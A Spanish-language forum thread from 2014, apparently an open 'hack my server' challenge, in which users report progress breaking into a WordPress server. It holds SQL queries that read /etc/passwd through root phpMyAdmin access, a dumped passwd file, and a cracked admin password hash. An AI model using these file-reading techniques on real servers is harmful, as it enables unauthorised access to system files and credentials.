Hack my server II

#!drvy · 1 Agosto 2014, 19:23 PM

Es que lo mas gracioso de todo es que la carpeta /uploads no existe xD

http://host.net/wp-content/uploads/

Saludos

MinusFour · 1 Agosto 2014, 19:30 PM

No hay permisos de escritura en la carpeta upload tampoco, lo acaba de probar, trate de hacer un post y esto fue lo que me dijo:

The uploaded file could not be moved to .

Aunque bien puede ser que no exista la carpeta uploads o que haya un .htaccess denegando xD.

Baal_30 · 1 Agosto 2014, 19:42 PM

"tonto" jejeje

Teniendo la pass de admin, ¿no se pueden crear directorios y tal? O sea, crear la carpeta upload y todo eso... ¿o eso se hace sólo desde el server con algún programa de los que se usan?

Disculpen mi ignorancia :/

MinusFour · 1 Agosto 2014, 19:44 PM

Cita de: Baal_30 en 1 Agosto 2014, 19:42 PM
"tonto" jejeje

Teniendo la pass de admin, ¿no se pueden crear directorios y tal? O sea, crear la carpeta upload y todo eso... ¿o eso se hace sólo desde el server con algún programa de los que se usan?

Disculpen mi ignorancia :/

Esa pass la ha puesto yo xD así que dudo mucho que haya otro servicio con esa password xDDD. Alguien cambio la password original de todos modos, así que no podemos saber si la pass original servia para otras cosas.

Baal_30 · 1 Agosto 2014, 19:48 PM

jaja pues si tuvieramos la pass original quizás serviría para otras cosas... pero bueno, entrando con la cuenta de admin y esa pass no se puede hacer lo que necesitamos ¿?

#!drvy · 1 Agosto 2014, 20:09 PM

Buenas

Algo de progreso...

/etc/passwd - sin contraseñas

Código (bash) [Seleccionar]

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/s...
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/...
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
fetchmail:x:101:65534::/var/lib/fetchmail:/bin/fal...
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
syslog:x:103:106::/home/syslog:/bin/false
klog:x:104:107::/home/klog:/bin/false
bind:x:105:109::/var/cache/bind:/bin/false
smmta:x:106:110:Mail Transfer Agent,,,:/var/lib/se...
smmsp:x:107:111:Mail Submission Program,,,:/var/li...
landscape:x:108:112::/var/lib/landscape:/bin/false
mysql:x:109:113:MySQL Server,,,:/nonexistent:/bin/.

Saludos

dimitrix · 1 Agosto 2014, 20:15 PM

Please, explica como llegaste hasta ahi :-)

xustyx · 1 Agosto 2014, 20:22 PM

Cita de: #!drvy en 1 Agosto 2014, 20:09 PM
Buenas

Algo de progreso...

/etc/passwd - sin contraseñas
Código (bash) [Seleccionar] Expandir
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/s... irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/... nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh fetchmail:x:101:65534::/var/lib/fetchmail:/bin/fal... sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin syslog:x:103:106::/home/syslog:/bin/false klog:x:104:107::/home/klog:/bin/false bind:x:105:109::/var/cache/bind:/bin/false smmta:x:106:110:Mail Transfer Agent,,,:/var/lib/se... smmsp:x:107:111:Mail Submission Program,,,:/var/li... landscape:x:108:112::/var/lib/landscape:/bin/false mysql:x:109:113:MySQL Server,,,:/nonexistent:/bin/.

Saludos

Usando el interprete sql de phpmyadmin
select load_file("/etc/passwd") from dual

Yo llevo rato leyendo files para ver si descubro algun path... he estado mirando por los *.conf de apache pero no encuentro nada pa pillar el path de la web.....

#!drvy · 1 Agosto 2014, 20:24 PM

Perdon xD

Bueno, tenemos acceso a PHPMyAdmin como root, tenemos todos los privilegios, esto lo podemos ver usando la pestaña Users de PHPMyAdmin.

root 127.0.0.1 No ALL PRIVILEGES Yes

Sabiendo esto, sabemos que tenemos acceso a funciones como LOAD DATA o DUMPFILE.

Por tanto, podemos crear una tabla, y usar LOAD DATA para ver el contenido de ficheros a los que tenemos acceso.

Código (sql) [Seleccionar]

LOAD DATA INFILE '/etc/passwd' INTO TABLE BaseDeDatos.tabla;

~~PD: @xustyx has mirado el directorio de webmin ? Yo es que no lo encuentro por ninguna parte xD~~

PD2: He vuelto a poner la contraseña original del usuario admin de WP (aclaro que no fui yo el que la cambio). Para quitaros trabajo inútil:
a7c85c1a6114797d06425195899a8abe = 2bc11f

PD3: El directorio de webmin es /usr/share/webmin

Saludos

daryo · 1 Agosto 2014, 20:34 PM

aun se puede pedir la ip ? jeje